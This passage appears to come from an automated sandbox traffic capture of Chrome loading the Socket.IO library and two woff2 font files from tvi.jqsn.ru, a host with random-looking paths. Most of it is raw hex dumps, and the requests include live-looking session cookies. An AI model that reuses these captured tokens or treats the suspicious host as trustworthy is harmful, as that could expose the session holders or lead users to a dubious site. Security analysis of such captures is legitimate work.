                                                                                                                          2024-04-17 00:34:48 UTC15683INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                                                                          Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                                                                                          2024-04-17 00:34:48 UTC16384INData Raw: 69 67 69 6e 22 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 2c 22 66 61 6d 69 6c 79 22 2c 22 63 68 65 63 6b 53 65 72 76 65 72 49 64 65 6e 74 69 74 79 22 29 3b 74 68 69 73 2e 6f 70 74 73 2e 65 78 74 72 61 48 65 61 64 65 72 73 26 26 28 6e 2e 68 65 61 64 65 72 73 3d 74 68 69 73 2e 6f 70 74 73 2e 65 78 74 72 61 48 65 61 64 65 72 73 29 3b 74 72 79 7b 74 68 69 73 2e 77 73 3d 73 74 3f 6e 65 77 20 6f 74 28 74 2c 65 2c 6e 29 3a 65 3f 6e 65 77 20 6f 74 28 74 2c 65 29 3a 6e 65 77 20 6f 74 28 74 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 74 29 7d 74 68 69 73 2e 77 73 2e 62 69 6e 61 72 79 54 79 70 65 3d 74 68 69 73 2e 73 6f 63 6b 65 74 2e 62 69 6e 61 72 79 54 79 70 65 7c 7c 22 61 72 72
                                                                                                                          Data Ascii: igin","maxPayload","family","checkServerIdentity");this.opts.extraHeaders&&(n.headers=this.opts.extraHeaders);try{this.ws=st?new ot(t,e,n):e?new ot(t,e):new ot(t)}catch(t){return this.emitReserved("error",t)}this.ws.binaryType=this.socket.binaryType||"arr
                                                                                                                          2024-04-17 00:34:48 UTC13739INData Raw: 72 22 2c 74 68 69 73 2e 6f 6e 65 72 72 6f 72 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 43 74 28 74 2c 22 63 6c 6f 73 65 22 2c 74 68 69 73 2e 6f 6e 63 6c 6f 73 65 2e 62 69 6e 64 28 74 68 69 73 29 29 5d 7d 7d 7d 2c 7b 6b 65 79 3a 22 61 63 74 69 76 65 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 74 68 69 73 2e 73 75 62 73 7d 7d 2c 7b 6b 65 79 3a 22 63 6f 6e 6e 65 63 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 6f 6e 6e 65 63 74 65 64 7c 7c 28 74 68 69 73 2e 73 75 62 45 76 65 6e 74 73 28 29 2c 74 68 69 73 2e 69 6f 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 7c 7c 74 68 69 73 2e 69 6f 2e 6f 70 65 6e 28 29 2c 22 6f 70 65 6e 22 3d 3d 3d 74 68 69 73 2e 69 6f 2e 5f 72 65 61 64 79 53 74
                                                                                                                          Data Ascii: r",this.onerror.bind(this)),Ct(t,"close",this.onclose.bind(this))]}}},{key:"active",get:function(){return!!this.subs}},{key:"connect",value:function(){return this.connected||(this.subEvents(),this.io._reconnecting||this.io.open(),"open"===this.io._readySt


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.449784104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:50 UTC1407OUTGET /89T0AFtET47Mtjcd1jdhpDg4Knmkab73 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:51 UTC730INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:51 GMT
                                                                                                                          Content-Type: font/woff2
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="89T0AFtET47Mtjcd1jdhpDg4Knmkab73"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vr4Hn7DnhEDJ6h3vVMfT3A7yFKhQG0I3rJZtWrmxX%2B6YUHyJhX%2F0qKowTrnSPZfELnWqaZLuh2lWmoEC79Xuz%2FLRP5fhIJ7U3GF01uOKyMH6TcLrezbi5D9fopoB7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854e83fcc53bd-ATL
                                                                                                                          2024-04-17 00:34:51 UTC639INData Raw: 33 32 39 61 0d 0a 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c
                                                                                                                          Data Ascii: 329awOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: da 6c 9a 70 40 13 91 80 84 a2 dd 03 74 c4 6f f4 d4 0a 76 c1 e7 1f 62 bf 67 dd f3 3f f0 10 6d e2 1e 21 a9 25 0d 89 e9 1a a9 78 a8 0c 4d 43 31 4d b0 bb a1 ee ff ff bf ed ff e7 da 6b af bd 91 7d 29 03 1b 2b 4e 87 9c 8a ef 17 51 5f 79 53 b6 58 a7 31 31 61 13 8a c3 03 26 60 a2 0d 27 22 bc 78 5a 0f b7 3d 62 5e e9 ec bf 1e 69 44 96 e1 11 7d 20 8c 8e 20 be ec 62 a6 ec fc 7d 44 49 76 75 d1 71 04 88 0f d8 6b cb 96 34 d2 0c f7 cc 14 40 c0 10 ce d5 ff 50 2a b0 b0 6a dc ed 89 29 f7 ec 94 27 df 4c 97 eb 89 c9 c2 ae b3 dc b1 62 e0 85 52 51 6a 49 2a 49 9b b4 51 6b da 54 ae 6c fa 5f 77 4f 0f d0 92 24 cb 1f e8 08 21 63 cc 2e 25 cb 7b 80 95 5f 4e 90 02 45 40 fc 00 0d 92 41 b0 da 9d f9 3f 9c ee 9a d9 61 57 0b 79 99 67 66 9d 67 1b 26 45 bc 0c f7 20 7e 88 78 f0 62 c5 cc 83 05
                                                                                                                          Data Ascii: lp@tovbg?m!%xMC1Mk})+NQ_ySX11a&`'"xZ=b^iD} b}DIvuqk4@P*j)'LbRQjI*IQkTl_wO$!c.%{_NE@A?aWygfg&E ~xb
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: a4 a7 e9 59 7a 9e 0a 3e 70 de 71 4e 39 ab 94 e5 55 d7 35 d7 75 d7 4d d7 2d 17 ae 2e b8 2f bb af ba 09 fd 5f cf 05 cf 45 0f 69 fe d9 77 ba ef 6c 1f 65 d5 e8 f5 a0 7f ea 22 9d 9a 33 d3 9d de 10 1f d7 49 9d 12 6b 87 7c c4 c7 d8 cb 3e f6 73 10 dd d8 b1 61 4f f6 c6 30 75 2b cd 1f e6 4f f3 74 a7 db f2 6c 99 b1 ee b6 3e d8 2e 6d d7 b6 39 fb 46 fb 99 7d 9e 5d 57 72 91 73 73 4b bc 1c 72 12 ba 1e 36 36 7c 33 22 22 2a 2a 26 26 21 c1 e1 10 c5 bc bc 32 65 90 3a 76 de b1 83 76 d7 75 c7 d1 ff bd fa ef 37 7f f3 ee 97 3e fc ec d3 2f 3e 0d 7f 59 f7 9d e0 41 40 40 00 c8 82 05 10 40 c9 06 6a 8b 76 3f a2 63 04 fc cf bf 1a e0 05 82 e1 03 a0 ae 09 a0 0b f4 c0 a3 aa 1c 80 71 5b ad cd 01 38 80 ba 26 50 ed 76 16 e9 84 82 9d 77 d3 ef ac 8c 5b 06 e0 52 8b 81 00 1e 2c a6 f3 af 20 bc
                                                                                                                          Data Ascii: Yz>pqN9U5uM-./_Eiwle"3Ik|>saO0u+Otl>.m9F}]WrssKr66|3""**&&!2e:vvu7>/>YA@@@jv?cq[8&Pvw[R,
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 37 46 69 48 cd 4c 8d bb d8 bf 1b 27 1c ef b2 0a 93 de 38 31 47 3a 35 8e 29 8a 3c 90 25 9e 22 cf a0 73 6c 46 61 ed 44 62 d1 d8 d4 9f 2c 27 32 cd c8 7d 04 da 09 c0 57 64 1f 9b 79 b1 89 2e 62 72 87 f7 c5 b2 fb 52 c2 b2 c4 41 12 81 34 01 86 c7 66 67 ae 91 d5 d1 0d 67 33 5c 20 06 41 38 10 e1 cc a9 19 64 33 3f 2a 25 ab 11 e4 13 01 e9 44 ae 3d cb 5b 69 7e db 22 51 70 ef 63 32 39 e9 64 71 a7 b5 30 b6 01 15 1a 29 e2 db ce 53 01 4b 24 89 db 11 9c 91 10 7d 9c ef d5 0f e1 38 11 2a 9e 08 b1 c6 95 68 36 08 c4 a8 a2 b4 98 b5 21 8e 45 d0 71 24 18 a7 83 42 25 37 a3 0f 52 82 02 89 71 3b a6 33 e3 76 a8 96 c5 96 00 31 78 04 a8 30 14 19 d5 19 35 da 35 a1 cc 49 64 7a 77 af a4 2d 6a 48 d5 f9 10 15 85 2c 13 a3 9e f6 44 fc 18 de 56 cd 85 7c a5 47 ac 97 c9 a3 b9 57 e1 c4 0a 96 52
                                                                                                                          Data Ascii: 7FiHL'81G:5)<%"slFaDb,'2}Wdy.brRA4fgg3\ A8d3?*%D=[i~"Qpc29dq0)SK$}8*h6!Eq$B%7Rq;3v1x055Idzw-jH,DV|GWR
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 38 13 a8 4b 76 63 25 de e8 d9 b9 4c 45 ae 2d 27 b4 4a 5e 82 d7 0c 36 c3 0d 16 89 18 9e 8c 5e 64 c9 8d ff bf 03 23 af 9f a1 bf dd 14 6f 3b b1 14 3d 02 b8 31 cc 60 52 75 5e 7d 4c 27 1e da a5 e0 70 33 97 f3 b6 49 38 86 f6 8e 42 bd 7b 28 a4 ae 52 b8 4c 7b 3b 08 5d 48 16 de 5c ea b8 d2 5a 1e 85 94 34 75 e8 49 d3 5e 26 60 bf a5 86 5b 4a 69 0c d1 e1 b8 20 fc 23 8b 97 28 3f 36 3d bc 0d d8 3d 52 72 fe 9d 98 df f6 99 86 c4 bc 22 f8 09 5a 28 e5 b7 77 89 61 b7 36 f9 53 75 68 4b 1e a3 d9 26 75 d4 2c cc 9b ab c9 a0 c4 be a0 65 70 6a fc 71 23 f4 aa f8 fc 97 90 31 c6 86 3b 8d 2e bf 22 ac c8 63 a8 a4 64 cd 76 00 e5 20 65 ff cf 30 3f a6 13 d2 e5 62 0b a4 27 2d 7d 39 cc f0 e0 9e 1d af b5 ec 6f 86 84 31 96 bb 8e 91 1f de f5 79 ed 91 b4 46 3e b6 fa d8 67 65 be e3 e4 c7 96 8c
                                                                                                                          Data Ascii: 8Kvc%LE-'J^6^d#o;=1`Ru^}L'p3I8B{(RL{;]H\Z4uI^&`[Ji #(?6==Rr"Z(wa6SuhK&u,epjq#1;."cdv e0?b'-}9o1yF>ge
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 2e ca 88 76 65 87 89 f9 8b 27 10 ac 49 92 27 ea a7 cf c6 51 30 5f ca d3 51 a5 67 e0 88 f9 1c 57 33 f6 06 4c 41 98 f3 f5 b8 83 2e 6e 1f cb ab 72 f8 13 f4 30 fa 57 eb ee 0c f9 86 f7 5a ef 3d 51 8a d4 57 e5 d3 f8 b6 e0 a4 c7 ec 21 75 d4 b5 59 d8 c7 c2 bb 20 06 ee dc e7 92 37 2d 1b e1 de 58 7f 4c 93 b6 dc c8 6b a3 ce 59 5f c3 25 0b 9d f2 4a e9 03 fe a9 a9 bb 81 48 18 fa 58 6c d7 68 8e c9 73 ff 93 f3 ea 71 72 7c d4 67 35 e2 25 58 ad 9b 53 bb 0e 1a 84 1a b8 82 5e 74 f8 f1 ff 58 67 54 9d 62 90 e9 68 f1 c4 58 64 f4 a7 11 7b 4a 5a 49 91 3e 4e c4 a0 f3 c2 16 05 ca 58 f5 2f 67 94 92 df bd d2 cb da 8d 4e 2f c9 b6 83 3e 5b 35 3d f8 fc e3 65 9c 37 d6 d2 a2 c6 49 f6 ae d8 e1 89 37 ae 63 7d 3f 6f 70 d7 3f 3b 22 5b 75 e5 01 5e 3b bd 02 7a e2 ad bd 31 24 3b ab 34 eb 3d 4b
                                                                                                                          Data Ascii: .ve'I'Q0_QgW3LA.nr0WZ=QW!uY 7-XLkY_%JHXlhsqr|g5%XS^tXgTbhXd{JZI>NX/gN/>[5=e7I7c}?op?;"[u^;z1$;4=K
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 65 fe 9c df d2 83 84 96 75 84 77 f8 35 c6 f6 3a 96 c2 dc 5d 40 53 8b 84 04 f2 b2 dd f5 c0 7e eb e3 42 9f 21 a9 ab bb fa 26 82 3d 33 d6 5b ed 88 92 5b ad 5d 2e 91 18 55 1e c8 c6 4e da 1b d9 cb 26 73 d3 28 c3 28 43 f4 ec af c5 52 78 6c f6 76 53 be 87 e8 22 7e 65 23 ab fa c5 0a 96 ec a7 d5 45 4c 1e ba 59 30 8f 71 e0 45 cd 17 36 9d d7 1b 32 2a 11 0d 58 a9 2e 71 1b 1f 61 c5 f5 94 ef d3 73 ea 88 7e fb b9 e6 e1 b6 70 c5 34 0a fa 3b 86 fc cc ba 3c 05 7c 34 ea 88 f5 a3 a2 c0 20 35 13 6c 15 e6 41 b8 3e b6 11 22 ac 69 58 6e 3e 6f 9f 28 7b a8 5f 8d bd 76 d8 eb 29 93 79 48 c9 a3 99 6f 6d 06 7f 5d 9e f1 6c 7c 55 3b 55 c9 af 3f cf 18 45 2c 1f 72 44 e3 8e 81 85 63 86 d5 6b ad b7 62 ee 7b 30 a5 df b6 73 24 1a c7 c1 b3 0d fe d9 73 ef 8f c3 b0 9d 51 f5 d7 70 ba 54 f4 24 dd
                                                                                                                          Data Ascii: euw5:]@S~B!&=3[[].UN&s((CRxlvS"~e#ELY0qE62*X.qas~p4;<|4 5lA>"iXn>o({_v)yHom]l|U;U?E,rDckb{0s$sQpT$
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: cf 65 5c 45 38 c6 3d 3c ed 15 14 f9 c8 29 55 b8 4f fc d9 9f 62 f8 21 f9 23 25 da f3 c3 a3 32 5d 7b 51 3d 5f 39 fa b9 b4 ad a3 9b de f8 61 5f 61 6b 86 87 f4 a2 81 98 a2 50 cc 25 33 e5 8f 56 7d 43 49 83 63 2a e6 64 47 14 f2 a9 66 1a c6 70 4b 5f 89 93 f1 d9 dc 5e 6c 97 2d 97 98 fa f9 89 93 e2 ee 78 43 e1 f8 8c 32 f2 52 b9 28 d4 a6 32 9a 40 88 66 46 b8 5f 12 ff ff f1 87 04 f0 10 a2 2a 99 3a 19 38 85 1e 76 b6 ca 97 a4 50 a1 74 c5 4a 64 28 d7 28 4b 8b 76 a5 ba f4 a8 34 64 58 ad 57 5e a9 37 61 5a 83 05 0b b0 56 ec 6a b1 ef 8d 6e 47 be ea 77 69 c1 73 7e 5b 36 e1 26 c8 81 08 6c e7 58 14 76 72 2e 2a 52 87 d1 0a 77 14 a7 68 9f bb 2f d5 97 1e 6b e9 a2 36 6d fd ae 5d 6f 7f 1a b0 82 9f bb 29 b7 d4 fd 91 ac f6 10 55 d6 d9 81 2f c0 08 b1 30 af 61 14 e9 1d cc 52 bc 9b 4d
                                                                                                                          Data Ascii: e\E8=<)UOb!#%2]{Q=_9a_akP%3V}CIc*dGfpK_^l-xC2R(2@fF_*:8vPtJd((Kv4dXW^7aZVjnGwis~[6&lXvr.*Rwh/k6m]o)U/0aRM
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: f4 12 4e 8f 3e 03 05 b1 b2 b1 ab 53 af 81 43 e3 0b 4a 1f cc 18 b1 e2 c4 c3 48 90 28 49 32 08 5f 95 22 55 9a 74 19 b2 e5 c8 95 27 5f e1 bc fe b3 ab 5a 8d 36 ed ba e0 74 eb 31 61 da 8c 35 eb 36 6c da b2 6d c7 ae 03 87 8e 9c 38 f5 ce a5 19 b3 e6 cc f3 04 35 b3 b0 b4 cd 86 ed 76 d8 69 17 89 4a a3 f3 33 98 2c 41 21 b6 b0 88 47 91 d7 a4 a8 59 49 85 cd e8 3b 74 ea d2 ad 47 af 01 83 2a 50 d0 30 b0 86 e7 e1 2b 22 33 b7 92 8a 9a 86 56 b1 9b 6b ab d7 c0 f1 42 d4 c9 4c 7c 57 eb 35 6a d6 a2 4d 87 17 ba 74 eb d5 6f f0 25 a9 7f fd e7 cc 5b b0 68 c9 b2 15 ab d6 ac db b4 65 db 8e 5d 7b f6 1f 5c 46 ee 05 c1 f8 3a a8 e2 f4 ae 1d 96 85 be 31 95 e5 ba 29 b3 5a 43 66 ac 5d ff 03 0f b1 75 01 fc b2 4f 81 3a f6 64 4f 47 bb 09 e2 3c 29 42 ad e2 3e 22 4d c4 96 88 6b 74 7e fd 64 e0
                                                                                                                          Data Ascii: N>SCJH(I2_"Ut'_Z6t1a56lm85viJ3,A!GYI;tG*P0+"3VkBL|W5jMto%[he]{\F:1)ZCf]uO:dOG<)B>"Mkt~d
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 7c 1c ee 10 90 d1 3c bc 92 87 d6 7d 61 34 aa d5 a4 bc d4 7e fa d8 03 69 6e c2 da a3 66 6f cf b5 c9 14 7c 70 4c b4 3f 16 76 28 d8 78 1e e2 c8 c3 db c3 b9 5d bd 3a 0d 2a bc d5 5f 50 d7 da a8 25 ef ee 7a 95 72 7f 17 f7 a8 f8 66 33 a8 b7 34 1a 88 9d 4a a5 7f da d5 0a 78 12 be 37 07 82 82 03 f3 57 85 84 d4 2b 00 1c 18 0f 5d 54 95 c8 98 28 93 32 63 a4 7d 4c 7f a8 5d 3c fc e6 0b 52 65 a8 96 ad 58 0e 9c 5d eb b6 6c 47 61 61 c3 76 2e 25 66 40 87 ee 2b 77 72 0b b9 36 71 8f ab 5f 1d 5b f5 cc bb 91 f0 45 30 3e 81 94 2f a3 d2 8e 56 37 3a 3d a8 75 61 30 8d d1 0c 4e 07 58 6c 60 b7 83 db 11 56 9b 78 3d f6 4d 93 ef f2 ae 35 07 29 06 c0 76 69 21 92 12 8b a1 27 35 49 2b 44 12 93 cf 48 71 b0 40 ca 43 53 1d 9e ca b0 90 23 52 1b 9b e6 94 b4 a7 a7 35 4d 21 2e 87 4c c3 aa 9a 97
                                                                                                                          Data Ascii: |<}a4~info|pL?v(x]:*_P%zrf34Jx7W+]T(2c}L]<ReX]lGaav.%f@+wr6q_[E0>/V7:=ua0NXl`Vx=M5)vi!'5I+DHq@CS#R5M!.L


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.449785104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:50 UTC1406OUTGET /cdMVTgR3ifU0J478w5vPGB5lhjWmn93 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:51 UTC735INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:51 GMT
                                                                                                                          Content-Type: font/woff2
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="cdMVTgR3ifU0J478w5vPGB5lhjWmn93"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5CJpofpigiY%2BM0U%2BlRvRpgAhvv%2FS3WvL%2B2%2F5LzUJSm2Of%2Fs9GFIo81XdAZITY73F4zuKQ16gRwCL70AI0KPtO2TnF62RZbwjik9ciB5VPlBRVfXUfuplLw4OMgslA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854e8fddb674e-ATL
                                                                                                                          2024-04-17 00:34:51 UTC634INData Raw: 33 32 64 38 0d 0a 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef
                                                                                                                          Data Ascii: 32d8wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor
